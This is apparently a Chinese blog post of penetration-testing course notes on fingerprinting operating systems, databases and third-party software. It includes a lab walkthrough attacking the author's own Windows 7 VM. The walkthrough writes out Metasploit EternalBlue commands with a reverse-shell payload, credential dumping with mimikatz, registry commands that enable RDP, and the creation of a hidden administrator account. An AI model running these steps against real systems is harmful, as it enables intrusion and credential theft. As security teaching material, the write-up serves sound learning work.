p5_第05天:基础入门-系统及数据库等

p5:第05天:基础入门-系统及数据库等

前言:除去前期讲到过的搭建平台中间件,网站源码外,容易受到攻击的还有操作系统,数据库,第三方软件平台等,其中此类攻击也能直接影响到Web或服务器的安全,导致网站或服务器权限的获取。
image.png

一、基础知识

一、操作系统层面

1、识别操作系统常见方法

A.有网站
    通过网站识别<br />        Windows对大小写不敏感,就可以替换网站路径的大小写进行测试<br />比如说对此网站地址更改大小写,发现打开的页面没有变化,说明这个操作系统可能是Windows。<br />![image.png](https://cdn.nlark.com/yuque/0/2022/png/29556149/1661584765221-ae751e1b-fb56-4244-be85-1b25bca81144.png#clientId=uc5edf580-1a3e-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=579&id=u8029d9e8&margin=%5Bobject%20Object%5D&name=image.png&originHeight=724&originWidth=1421&originalType=binary&ratio=1&rotation=0&showTitle=false&size=442716&status=done&style=none&taskId=u178ad2c3-b34f-4693-90fa-2d541a0e01b&title=&width=1136.8)<br />![image.png](https://cdn.nlark.com/yuque/0/2022/png/29556149/1661584842164-95b15535-92a7-4610-b66b-1b6a2706b463.png#clientId=uc5edf580-1a3e-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=596&id=u2f41354f&margin=%5Bobject%20Object%5D&name=image.png&originHeight=745&originWidth=1406&originalType=binary&ratio=1&rotation=0&showTitle=false&size=462409&status=done&style=none&taskId=u5ccb3c19-17c4-44ad-96d1-226c45e04ef&title=&width=1124.8)<br />下面这个p换成大写就出现了问题,说明这个操作系统对应的是linux系统。<br />![image.png](https://cdn.nlark.com/yuque/0/2022/png/29556149/1661584902992-94be432f-a0c4-404c-9409-2e54f64308df.png#clientId=uc5edf580-1a3e-4&crop=0&crop=0&crop=1&crop=1&from=paste&height=506&id=u1fbe294c&margin=%5Bobject%20Object%5D&name=image.png&originHeight=633&originWidth=1197&originalType=binary&ratio=1&rotation=0&showTitle=false&size=89871&status=done&style=none&taskId=ua51cdda0-841d-4896-b6fc-4f282a1c785&title=&width=957.6)

B.无网站

通过扫描识别
**nmap扫描(建议使用)**nmap -O IP地址
image.png
可以百度一下用法。
可以win上下载nmap然后配置环境使用,也可以直接使用kali的nmap扫描。
image.png
image.png
PS:不是所有的系统都可以用这种方式扫描出操作系统的类型,比如说Windows的一些高版本无法检测。
不过我这个win10虚拟机被扫描出来了。
image.png

C.TTL值判断

(不介意使用,不是很准确)
image.png
比如说ping一下博客,ttl=112,但是没有对应的值,跟WindowsNT/2000比较相近,其实是Windows2008的,和Windows NT相近。
image.png

D.特殊端口识别

2、简要两者区别及识别意义

区别:盘组合(网站路径问题:Windows有分盘,linux没有,存储方式不一样)、大小写、文件类型等等。
Windows和Linux的漏洞不一样,所以要对操作系统进行识别

3、操作系统层面漏洞类型对应意义

有些漏洞可能会影响权限的丢失,有的可能不会;不同漏洞会造成不同漏洞利用的条件
比如MS17010-永恒之蓝漏洞,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
image.png

4、简要操作系统层面漏洞影响范围

主要是围绕权限方面;有些漏洞会造成系统崩溃、蓝屏或者权限提升等等

二、数据库层面

1、识别数据库类型常见方法

网站99%是动态网站,1%是静态网站(没有用代码进行数据传输,无漏洞)。
必须要用数据传递才能有漏洞。
小型数据库:access、mysql
大型数据库:oracle、sqlserver
数据库不一定只有网站应用有,游戏应用也有,玩家数据就需要数据库。
有网站就识别,没有网站就用nmap来扫。

Asp数据库——Access/mysql
php + mysql 
aspx+mssql
jsp +mysql/oracle
Python + MongoDB/MySQL
……

端口扫描:(端口开放性)

关系型数据库:
MySQL数据库默认端口号为,3306;
Oracle数据库默认端口号为,1521;
SQLServer数据库默认端口号为,1433;
postgreSQL数据库默认端口号为,5432;

NoSQL数据库:
MongoDB默认端口号为:27017;
Redis默认端口号为:6379;
Memcached默认端口号为:11211;
————————————————
版权声明:本文为CSDN博主「携梦问道」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_41797451/article/details/120061216
DB2 5000
pointbase 9092

image.png
image.png

2、数据库类型区别及识别意义

数据库不同结构不同,漏洞也不同。
不同的数据库的攻击方式也不完全一样。

3、数据库常见漏洞类型及攻击

1、弱口令攻击
2、数据库漏洞攻击
参考

4、简要数据库层面漏洞影响范围

数据库权限、网站权限、修改网页内容

三、第三方层面

1、如何判断有那些第三方平台或软件

如果有自己下载的第三方软件,比如vsftpd,可能有漏洞,我们就可以根据这个漏洞攻击他。
如何判断:①通过网站扫描是否有第三方软件,比如phpadmin,通过扫描是否有安装目录来判断是否安装了第三方软件;②通过端口扫描。比如说扫描端口21,可能开启了ftp服务。

namp -sV 探测开放的端口服务和版本信息

2、简要为什么要识别第三方平台或软件

不同的第三方软件或工具存在不同的漏洞、识别到更多的信息对收集到的漏洞也就越多

3、常见第三方平台或软件漏洞类型及攻击

弱口令、软件的漏洞攻击

4、简要第三方平台或软件安全测试的范围

直接获取到软件的权限便于进一步的提权和攻击

四、补充

   除去常规wEB安全及APP安全测试外,类似服务器单一或复杂的其他服务(邮件,游戏,负载均衡等),也可以作为安全测试目标,此类目标测试原则只是少了web应用或其他安全问题。所以明确安全测试思路是很重要的!

ps:后面课程安排:漏洞技术->web层面,系统层面,第三方等其他。

二、演示

1、上述涉及的基础知识演示(用kali的msf攻击)

(1)Metasploit定义及使用模块介绍

(2)实验设备

实验设备:kali、win7
靶机IP(win7):192.168.253.158**(关闭防火墙且需开放445端口)**
攻击机(kali):192.168.253.128
攻击工具:kali自带的msfconsole工具
互相ping一下。
image.png
image.png

(3)实验流程

A.用msfconsole查看靶机信息。

打开kali终端的msfconsole工具。

msfconsole

image.png
出现msf6,表示打开成功,可以输入命令。
寻找ms17-010漏洞试试手。

search ms17-010

image.png
可以看到auxiliary/scanner/smb/smb_ms17_010属于第三个。
接下来进入第三个,并查看其配置。

use 3
show options

image.png
标了yes的说明需要修改,标了no的可以直接使用其默认的。
进入use exploit/windows/smb/ms17_010_eternalblue。

use exploit/windows/smb/ms17_010_eternalblue  //加载攻击模块
set lhost 192.168.253.128  //设置本机地址
set rhost 192.168.253.158  //设置靶机地址
set lport 4444             //设置本机端口号
set payload windows/x64/meterpreter/reverse_tcp    //配置回链方式

image.png
查看刚刚配置好的。

show options

image.png
开始攻击。

exploit

image.png
用sysinfo查看靶机系统信息。

sysinfo

image.png
用screenshot截屏靶机的界面。

screenshot

image.png
进入该地址查看图片。
image.png
打开。
image.png
有点牛,还可以截屏到他的界面。

B.查看靶机登录用户及密码。

下载mimikatz。但是这个显示mimikatz已经呗kiwi替代了,所以自动下载了kiwi。显示success表示下载成功。下载后可输入help查看各指令的操作意义。

load mimikatz

image.png
image.png
输入creds_all直接获取密码。

creds_all

image.png

C.用msf将靶机的3389远程连接端口打开。

我们已经通过msf用ms17_010漏洞简单拿到了靶机的shell。
进入靶机的cmd操作。

shell

image.png
查看靶机的端口。

netstat -an

image.png
可以看到445端口是开着的,但是3389端口是关闭的,所以我们要打开3389端口。
开之前先查看现在是什么权限,必须为system权限才能进行开端口操作。

whoami 

image.png
输入以下命令打开3389端口。(两种方法,选其中一个就行)

方法一:wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
方法二:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image.png
开启成功。
image.png
也可以但看3389是否开启。

netstat -an|find "3389"

image.png
已经在监听了。
ps:远程桌面的默认端口是3389,但是可能管理员会更改了远程端口,所以我们需要通过查看注册表键值确认远程桌面的端口是否为3389。

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

image.png
(0xd3d是16进制的3389)

D.用kali自带的xfreerdp进行远程连接。

添加用户和管理组。123123为用户密码。用户名为hack。

net user hack 123123 /add   
net localgroup administrators hack /add

image.png
在kali终端打开xfreerdp。
用下列命令进行远程连接。
/u是用户名,/p是密码,/v是靶机(目标)的地址, /size就是图形化界面的大小。

xfreerdp /u:hack /p:123123 /v:192.168.253.158 /size:80%

image.png
转到win7虚拟机,看到win7上出现了这个弹窗。
image.png
image.png
kali打开了freerdp界面,这里是重新加了win7用户的界面,在里面放了一个hack的文档。
image.png
留下一个文件。
回到靶机,登录了win7,没有变化;应该是因为我重新创建了用户,用密码123123登陆了hack用户,进入win7.
image.png
如果回到快照1,还会不会有hack用户呢?
image.png
image.png
没有hack用户了。因为我这个快照是在做这个实验前设置的。
参考网站:

2、演示某操作系统层面漏洞演示(Mysql 身份认证绕过漏洞(CVE-2012-2122))

参考网址:
image.png
不知道为什么一直失败。
先在ubuntu打开环境。
image.png
image.png
回到kali。
image.png
image.png
image.png
参考网址:Mysql 身份认证绕过漏洞(CVE-2012-2122)复现_m__ing的博客-CSDN博客

3、某数据库弱口令及漏洞演示

4、某第三方应用安全漏洞演示

参考网址:

  • 0
    点赞
  • 0
    收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:黑客帝国 设计师:我叫白小胖 返回首页
评论

打赏作者

Halo_cx

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值